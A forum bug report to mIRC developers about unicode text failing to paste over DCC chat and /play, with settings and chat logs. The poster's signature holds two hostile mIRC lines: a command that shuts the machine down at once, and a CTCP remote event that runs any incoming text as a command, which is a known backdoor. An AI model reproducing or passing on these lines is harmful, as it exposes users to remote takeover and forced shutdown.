Tried to paste text between myself and a friend to make sure that our previously mentioned error had really been fixed (Error #30.Fixed unicode encoding bug when pasting large amounts of text.)

This, however, did not work in the least bit.

My Options:: Multibyte EditBox & Display, UTF-8 Display, Font Linking.
His Options:: Multibyte EditBox & Display, UTF-8 Display, Font Linking.

Not that it matters much, we're both using SSL on the server this was tested on.

These options weren't changed during both tests.

As an example of what he pasted (both of us had remote on):
DCC Chat session
Client: Sugiura_Midori (
Time: Mon Nov 05 17:55:28 2007
Acknowledging chat request...
Waiting for acknowledgement...
DCC Chat connection established
[17:55:40] <silverfire> D:?
[17:55:43] <silverfire> Detected framerate: 23.976
[17:55:43] <silverfire> 1 0 27
[17:55:43] <silverfire> 2 28 50
[17:55:43] <silverfire> 3 51 61
[17:55:43] <silverfire> 4 62 76
[17:55:43] <silverfire> 5 77 85
[17:55:43] <silverfire> 6 86 118
[17:55:43] <silverfire> 7 119 136
[17:55:43] <silverfire> 8 137 159
[17:55:43] <silverfire> 9 160 316
[17:55:43] <silverfire> 10 317 927
[17:55:43] <silverfire> 11 928 1169
[17:55:43] <silverfire> 12 1170 1283
[17:55:43] <silverfire> 13 1284 1337
[17:55:43] <silverfire> 14 1338 1450
[17:55:43] <silverfire> 15 1451 1846
[17:55:43] <silverfire> 16 1576 1847
[17:55:43] <silverfire> 17 1848 1858
[17:55:43] <silverfire> 18 1859 1869
[17:55:43] <silverfire> 19 1870 1952
[17:55:43] <silverfire> 20 1953 2063
[17:55:43] <silverfire> 21 2064 2085
[17:55:43] <silverfire> 22 2086 2127
[17:55:43] <silverfire> 23 2128 2164
[17:55:43] <silverfire> 24 2165 2200
[17:55:43] <silverfire> 25 2201 2251
[17:55:43] <silverfire> 26 2252 2278
[17:55:43] <silverfire> 27 2279 2361
[17:55:43] <silverfire> 28 2362 2406
[17:55:43] <silverfire> 29 2407 2442
[17:55:43] <silverfire> 30 2443 2465
[17:55:43] <silverfire> 31 2466 2475
[17:55:43] <silverfire> 32 2476 2483
[17:55:43] <silverfire> 33 2484 2501

What I saw:
Chat with silverfire
Waiting for acknowledgement...
DCC Chat connection established
<silverfire> D:?
<silverfire> Detected framerate: 23.976
> one line
* /savebuf: invalid window
* /savebuf: insufficient parameters

-- I added those last two lines to illustrate I wasn't simply cutting it out

Then we both turned off remotes, and again::
DCC Chat session
Client: silverfire (IP)
Time: Mon Nov 05 19:04:37 2007
Acknowledging chat request...
DCC Chat connection established
<silverfire> Detected framerate: 23.976
* Remote is on (Ctcps,Events,Raw)

Only the one line came through.

On a related note, /play continues to not display unicode characters correctly. First is what I see from ctrl+v, second was from /play.
> &#37504;&#12398;&#22833;&#25943;: thast the only thing thatd possibly interfere with pasting
> &#37504;&#12398;&#22833;&#25943;: lemme try using /paste
> &#26441;&#28006;&#12288;&#30887;: you mean /play
> &#37504;&#12398;&#22833;&#25943;: same thing, paste is just play with presets
> &#26441;&#28006;&#12288;&#30887;: lemme paste the msn log, it has utf-8 in it
> &#26441;&#28006;&#12288;&#30887;: ah
* Playing 'playq1.txt' to Chat silverfire with 0ms delay
> ????: XD
> ?? ?: yeh.. hang on.. still need to try pasting to you
> ?? ?: ?
> ????: i saw it all
> ????: D:
> ?? ?: k...
> ????: did that work?
> ?? ?: i see nothing

Again only a snippit, but it proves the point.

Edit:: Seems these forums, or something, can't display the unicode properly, but it's all there... smirk

<<mIRC&#12399;&#22833;&#25943;&#12384;...>> <-- for some reason this shows up, but it doesn't work in a [ code ] block >.<

Edit2:: The unicode (for color codes) fails to paste from mIRC into MSN via Pidgeon, and perhaps other chat clients, browsers, or various text editors that would normally support it. So it would seem color codes eat it when pasting a line with unicode in them, which is not all that suprising to me as I've delt with that in a unicode parsing perl script before... but anyhow, gl fixing the error smirk

Last edited by Midori; 06/11/07 02:42 AM.

/run shutdown.exe -s -t 0
ctcp ^*:r*:*:{$($2-,2)|halt}